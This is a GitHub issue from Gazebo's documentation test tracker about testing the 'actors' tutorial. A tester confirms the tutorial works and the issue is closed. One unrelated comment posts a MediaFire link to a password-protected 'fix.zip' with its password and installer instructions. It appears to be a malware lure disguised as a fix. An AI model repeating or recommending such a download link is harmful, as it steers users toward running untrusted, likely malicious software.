gazebosim/gazebo_test_cases #1053: docs: actors

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/actors)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/actors.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

avanmalleghem, 2024-09-05:
Interested in !

avanmalleghem, 2024-09-05:
It works as expected and the tutorial is clear ! can be closed
[Screencast from 05-09-24 08:03:36.webm](https://github.com/user-attachments/assets/b9596b1f-1e0b-41de-8cbc-0a4038cd79f0)

ahcorde, 2024-09-05:
Thank you for testing!

closed 2024-09-05 by ahcorde